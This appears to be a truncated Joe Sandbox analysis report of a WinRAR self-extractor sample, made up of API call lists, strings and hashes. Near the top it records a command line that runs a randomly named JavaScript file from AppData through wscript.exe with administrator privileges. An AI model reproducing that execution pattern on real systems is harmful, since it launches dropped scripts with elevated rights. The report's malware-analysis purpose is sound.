Commandline:	C:\Windows\SysWOW64\wscript.exe "C:\Users\user\AppData\Local\9e146be90.js" 188
Imagebase:	0x7d0000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Disassembly

Reset < >

Analysis Process: YyVnwn8Zst.exePID: 1468, Parent PID: 4004COMMON

Execution Graph

Execution Coverage:	9.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.2%
Total number of Nodes:	1436
Total number of Limit Nodes:	31

Executed Functions

Function 00BDCC0E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 199
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00BCFD60: GetModuleHandleW.KERNEL32 ref: 00BCFD78
Part of subcall function 00BCFD60: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00BCFD90
Part of subcall function 00BCFD60: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00BCFDB3

Part of subcall function 00BD966B: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00BD9673

Part of subcall function 00BD9B13: OleInitialize.OLE32(00000000), ref: 00BD9B2C
Part of subcall function 00BD9B13: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00BD9B63
Part of subcall function 00BD9B13: SHGetMalloc.SHELL32(00C075C0), ref: 00BD9B6D

Part of subcall function 00BD103F: GetCPInfo.KERNEL32(00000000,?), ref: 00BD1050
Part of subcall function 00BD103F: IsDBCSLeadByte.KERNEL32(00000000), ref: 00BD1064

GetCommandLineW.KERNEL32 ref: 00BDCC56
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00BDCC7D
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00BDCC8E
UnmapViewOfFile.KERNEL32(00000000), ref: 00BDCCC8

Part of subcall function 00BDC8E7: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00BDC8FD
Part of subcall function 00BDC8E7: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00BDC939

CloseHandle.KERNEL32(00000000), ref: 00BDCCD1
GetModuleFileNameW.KERNEL32(00000000,00C1CE18,00000800), ref: 00BDCCEC
SetEnvironmentVariableW.KERNEL32(sfxname,00C1CE18), ref: 00BDCCFE
GetLocalTime.KERNEL32(?), ref: 00BDCD05
_swprintf.LIBCMT ref: 00BDCD44
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00BDCD56
GetModuleHandleW.KERNEL32(00000000), ref: 00BDCD59
LoadIconW.USER32(00000000,00000064), ref: 00BDCD70
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001A62C,00000000), ref: 00BDCDC1
Sleep.KERNEL32(?), ref: 00BDCDEF
DeleteObject.GDI32 ref: 00BDCE2E
DeleteObject.GDI32(?), ref: 00BDCE3A
CloseHandle.KERNEL32 ref: 00BDCE79

Strings

C:\Users\user\Desktop, xrefs: 00BDCC23
sfxstime, xrefs: 00BDCD51
STARTDLG, xrefs: 00BDCDB6
sfxname, xrefs: 00BDCCF9
winrarsfxmappingfile.tmp, xrefs: 00BDCC71
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 00BDCD35

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 788466649-277078469
Opcode ID: 0e7d4ed40272b331022ed14213ecc47c0ee1e9a20940b1437e6eba8455ff9490
Instruction ID: f58c6c621bb05d081423cbb7048d3a089cba46d6ef6eb88ac431e70b55f766c5
Opcode Fuzzy Hash: 0e7d4ed40272b331022ed14213ecc47c0ee1e9a20940b1437e6eba8455ff9490
Instruction Fuzzy Hash: 3661C3B1904241ABD710AB64EC49F7BBBECEB49700F0540AAF545A72A1EF74AD44CB61

Function 00BD96AD Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 92
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(00000066,PNG,?,?,00BDA5A5,00000066), ref: 00BD96BE
SizeofResource.KERNEL32(00000000,751E5780,?,?,00BDA5A5,00000066), ref: 00BD96D6
LoadResource.KERNEL32(00000000,?,?,00BDA5A5,00000066), ref: 00BD96E9
LockResource.KERNEL32(00000000,?,?,00BDA5A5,00000066), ref: 00BD96F4
GlobalAlloc.KERNELBASE(00000002,00000000,00000000,?,?,?,00BDA5A5,00000066), ref: 00BD9712
GlobalLock.KERNEL32(00000000), ref: 00BD971F
CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00BD973F
GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00BD977A
GlobalUnlock.KERNEL32(00000000), ref: 00BD978F
GlobalFree.KERNEL32(00000000), ref: 00BD9796

Strings

PNG, xrefs: 00BD96AF

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
String ID: PNG
API String ID: 3656887471-364855578
Opcode ID: 5874845fa2ae0ee372d2f3ecb8c2f2d40497610094d526a14167dbf6032e15b0
Instruction ID: 8039c0c54082932dd22ae4e4f3b35c09348665d0ae1b9cc23d4464f79ea72f72
Opcode Fuzzy Hash: 5874845fa2ae0ee372d2f3ecb8c2f2d40497610094d526a14167dbf6032e15b0
Instruction Fuzzy Hash: DF218D71611306ABD7269F61DC88A3BBBEDFF85790B15056AF945D3260EB31DC00CAA1

Function 00BCA383 Relevance: 7.6, APIs: 5, Instructions: 108
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00BCA27E,000000FF,?,?), ref: 00BCA3B8
FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,00BCA27E,000000FF,?,?), ref: 00BCA3EE
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00BCA27E,000000FF,?,?), ref: 00BCA3F6
FindNextFileW.KERNEL32(?,?,?,?,?,?,00BCA27E,000000FF,?,?), ref: 00BCA41E
GetLastError.KERNEL32(?,?,?,?,00BCA27E,000000FF,?,?), ref: 00BCA42A

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next
String ID:
API String ID: 869497890-0
Opcode ID: 29f2452b04c8129e07e2dadfce8f5c58b77fb15d6742cead00e8e4d6e2c4908c
Instruction ID: 764ecacae758202d017b79ef41766b990894297918d79e7548a3dd8ec1814788
Opcode Fuzzy Hash: 29f2452b04c8129e07e2dadfce8f5c58b77fb15d6742cead00e8e4d6e2c4908c
Instruction Fuzzy Hash: 4A415272604245AFC324EF68C885EEAF7E8FB48344F004A6EF5D9D3240D774A9549B92

Function 00BE6B19 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,00BE6AEF,00000003,00BFA8C8,0000000C,00BE6C46,00000003,00000002,00000000,?,00BE7B90,00000003), ref: 00BE6B3A
TerminateProcess.KERNEL32(00000000,?,00BE6AEF,00000003,00BFA8C8,0000000C,00BE6C46,00000003,00000002,00000000,?,00BE7B90,00000003), ref: 00BE6B41
ExitProcess.KERNEL32 ref: 00BE6B53

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 9921f036352ad480843572f45036fdc8b7bfc63d211272ade2866a54232b85f0
Instruction ID: 73eb4a6debd42988fb3936801e080abb7b1d9ed4bb06f79e55bed893c3406018
Opcode Fuzzy Hash: 9921f036352ad480843572f45036fdc8b7bfc63d211272ade2866a54232b85f0
Instruction Fuzzy Hash: CCE0B676001288ABDF116F76DD0AE687FA9EF50381F008064F9059B221DF35ED52CB90

Function 00BC8458 Relevance: 3.9, APIs: 2, Instructions: 940COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BC845D
_memcmp.LIBVCRUNTIME ref: 00BC88D2

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: H_prolog_memcmp
String ID:
API String ID: 3004599000-0
Opcode ID: b171167df5465f83b3de4aade15c659ea582361ff4bbe8fced674603e2da906f
Instruction ID: 1cb736ca0b618792c7cba98033b237c8cb25a5b81ba02dbba209979cb911866f
Opcode Fuzzy Hash: b171167df5465f83b3de4aade15c659ea582361ff4bbe8fced674603e2da906f
Instruction Fuzzy Hash: A2820471904285AEDF25DF64C885FFABBE9EF15300F0844FEE8599B142DB319A85CB60

Function 00BD62E0 Relevance: .3, Instructions: 325COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e97a3e99c419ab3d31fc1b3c85e88f98bca51de35e0f240377b161871ecce615
Instruction ID: d92171c223d7e2abcee94b093c71dc024f953e44a4dd9ab27a3368ce591207a9
Opcode Fuzzy Hash: e97a3e99c419ab3d31fc1b3c85e88f98bca51de35e0f240377b161871ecce615
Instruction Fuzzy Hash: D1D1E6B1A043458FDB14CF28D88179AFBE0FF95308F0445AEE9449B742E734E959CB9A

Function 00BDA62C Relevance: 100.5, APIs: 48, Strings: 9, Instructions: 724COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BDA631

Part of subcall function 00BC12D7: GetDlgItem.USER32(00000000,00003021), ref: 00BC131B
Part of subcall function 00BC12D7: SetWindowTextW.USER32(00000000,00BF22E4), ref: 00BC1331

Strings

-el -s2 "-d%s" "-sp%s", xrefs: 00BDA9C5
<, xrefs: 00BDA9DE
C:\Users\user\Desktop, xrefs: 00BDAA23
STARTDLG, xrefs: 00BDA650
@, xrefs: 00BDA9EB
LICENSEDLG, xrefs: 00BDAEB1
__tmp_rar_sfx_access_check_%u, xrefs: 00BDA90B
winrarsfxmappingfile.tmp, xrefs: 00BDAA00
"%s"%s, xrefs: 00BDAB67

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: H_prologItemTextWindow
String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 810644672-3870082069
Opcode ID: d7c2d3d848aa6851f026570f9f716900b0de2c1008e4ca5325102cc3f433dd07
Instruction ID: 2c6a30a40c9d63023580cb4fd64a05ea742804507075e670755150b5fe13eafa
Opcode Fuzzy Hash: d7c2d3d848aa6851f026570f9f716900b0de2c1008e4ca5325102cc3f433dd07
Instruction Fuzzy Hash: 8542F771944344AEEB259B609C85FFEBBE8EB01700F0541EAF601A72D1EB759D44CB62

Function 00BCFD60 Relevance: 51.1, APIs: 22, Strings: 7, Instructions: 314
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 00BCFD78
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00BCFD90
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00BCFDB3
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00BD005E
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BD0076
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BD0088
ReadFile.KERNEL32(00000000,?,00007FFE,00BF28D4,00000000), ref: 00BD00A7
CloseHandle.KERNEL32(00000000), ref: 00BD00FF
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00BD0115
CompareStringW.KERNEL32(00000400,00001001,00BF2920,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00BD016F
GetFileAttributesW.KERNELBASE(?,?,00BF28EC,00000800,?,00000000,?,00000800), ref: 00BD0198
GetFileAttributesW.KERNEL32(?,?,00BF29AC,00000800), ref: 00BD01D1

Part of subcall function 00BCFD16: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00BCFD31
Part of subcall function 00BCFD16: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00BCE82C,Crypt32.dll,?,00BCE8AE,?,00BCE892,?,?,?,?), ref: 00BCFD53

_swprintf.LIBCMT ref: 00BD0241
_swprintf.LIBCMT ref: 00BD028D

Part of subcall function 00BC3F53: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BC3F66

AllocConsole.KERNEL32 ref: 00BD0295
GetCurrentProcessId.KERNEL32 ref: 00BD029F
AttachConsole.KERNEL32(00000000), ref: 00BD02A6
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00BD02CC
WriteConsoleW.KERNEL32(00000000), ref: 00BD02D3
Sleep.KERNEL32(00002710), ref: 00BD02DE
FreeConsole.KERNEL32 ref: 00BD02E4
ExitProcess.KERNEL32 ref: 00BD02EC

Strings

dwmapi.dll, xrefs: 00BCFE1B, 00BD0204
DXGIDebug.dll, xrefs: 00BCFDF0, 00BD015B
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00BD027B
uxtheme.dll, xrefs: 00BD020E
SetDefaultDllDirectories, xrefs: 00BCFDAD
kernel32, xrefs: 00BCFD6E
SetDllDirectoryW, xrefs: 00BCFD8A

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 1201351596-3298887752
Opcode ID: 530ef4966b8fc15ca0bcd158f0cc09476ec22ec3adda628cf834d58f2e1cd62e
Instruction ID: 78e8794d027e067945809e890382073fad81786948dc35356cb694cd80a6a066
Opcode Fuzzy Hash: 530ef4966b8fc15ca0bcd158f0cc09476ec22ec3adda628cf834d58f2e1cd62e
Instruction Fuzzy Hash: E8D163720093899BD330DF60C849FAFBBE8EB85704F5049ADF68997250DBB0854DCB62

Function 00BDB522 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 438
windowfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00BDB527

Part of subcall function 00BDA1C9: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00BDA291

SetFileAttributesW.KERNEL32(?,00000005,?,?,?,00000800,?,?,00000000,00000001,00BDAE3A,?,00000000), ref: 00BDB65C
GetFileAttributesW.KERNEL32(?), ref: 00BDB716
DeleteFileW.KERNEL32(?), ref: 00BDB724
SetWindowTextW.USER32(?,?), ref: 00BDB86D
_wcsrchr.LIBVCRUNTIME ref: 00BDB9F7
GetDlgItem.USER32(?,00000066), ref: 00BDBA32
SetWindowTextW.USER32(00000000,?), ref: 00BDBA42
SendMessageW.USER32(00000000,00000143,00000000,00C09602), ref: 00BDBA56
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00BDBA7F

Strings

%s.%d.tmp, xrefs: 00BDB73C
ProgramFilesDir, xrefs: 00BDB941
Software\Microsoft\Windows\CurrentVersion, xrefs: 00BDB916
<br>, xrefs: 00BDB7D0

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: File$AttributesMessageSendTextWindow$DeleteEnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 3676479488-312220925
Opcode ID: c2fc1ed15f46a018d77e4c4cf2cb49d0c9168938587c77897d5ed4ebe8b21412
Instruction ID: 5539b3cd11684cb07e99850561aa8ceab40c9ecef510f6241b14ad3ae27dfae1
Opcode Fuzzy Hash: c2fc1ed15f46a018d77e4c4cf2cb49d0c9168938587c77897d5ed4ebe8b21412
Instruction Fuzzy Hash: 42E13F76900259AAEF24ABA4DD85EEEB7BCEB04350F0040E7F915E7151EF749B84CB60

Function 00BCD019 Relevance: 23.3, APIs: 4, Strings: 9, Instructions: 557
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00BCD022
_wcschr.LIBVCRUNTIME ref: 00BCD043
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00BCD05E
__fprintf_l.LIBCMT ref: 00BCD544

Part of subcall function 00BD1006: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00BCB3AF,00000000,?,?,?,000103CC), ref: 00BD1022

Strings

a, xrefs: 00BCD1CB
R, xrefs: 00BCD1C1
RTL, xrefs: 00BCD50C
*messages***, xrefs: 00BCD1AF
*messages***, xrefs: 00BCD176
$%s:, xrefs: 00BCD52A
,, xrefs: 00BCD57F
@%s:, xrefs: 00BCD531, 00BCD53A
, xrefs: 00BCD62B, 00BCD4A7

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 4184910265-4124877899
Opcode ID: cf71a2d603997e95445fd22157ffbf608e4a3d28328d6a3a4122afc3356fd790
Instruction ID: 6d18ebe487e0b2798722ae356afb87de8c8a513d96dbd618a4eb6078bc9ec635
Opcode Fuzzy Hash: cf71a2d603997e95445fd22157ffbf608e4a3d28328d6a3a4122afc3356fd790
Instruction Fuzzy Hash: 0012CDB5600349ABDB24EFA4CC85FA977E9EF54300F5001BEFA4997292EB70D985CB50

Function 00BDC1EB Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 96
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(00000068,00C1DE38), ref: 00BDC1FA
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,00BD9E02,00000001,?,?,00BDA61B,00BF3CB0,00C1DE38), ref: 00BDC225
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00BDC234
SendMessageW.USER32(00000000,000000C2,00000000,00BF22E4), ref: 00BDC23E
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00BDC254
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00BDC26A
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00BDC2AA
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00BDC2B4
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00BDC2C3
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00BDC2E6
SendMessageW.USER32(00000000,000000C2,00000000,00BF304C), ref: 00BDC2F1

Strings

\, xrefs: 00BDC25A

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: MessageSend$ItemShowWindow
String ID: \
API String ID: 1207805008-2967466578
Opcode ID: 296da92743db97f1c169bedb6ce2d7e14f606d608d92793598b71306aac901b1
Instruction ID: 5b3226f288c94210d6d4fc2047d5d78b701edfe446c2fcfe1a686757e5355279
Opcode Fuzzy Hash: 296da92743db97f1c169bedb6ce2d7e14f606d608d92793598b71306aac901b1
Instruction Fuzzy Hash: D82146712497453FE310EB249C41FAF7FDCEF82714F010609F690972D0DBA55A08CAA6

Function 00BDC487 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExW.SHELL32(000001C0), ref: 00BDC5B5
ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?), ref: 00BDC5FA
GetExitCodeProcess.KERNEL32(?,?), ref: 00BDC632
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00BDC658
ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?), ref: 00BDC6E7

Part of subcall function 00BD1438: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00BCADA2,?,?,?,00BCAD51,?,-00000002,?,00000000,?), ref: 00BD144E

Strings

, xrefs: 00BDC507
.inf, xrefs: 00BDC571
.exe, xrefs: 00BDC662

Memory Dump Source

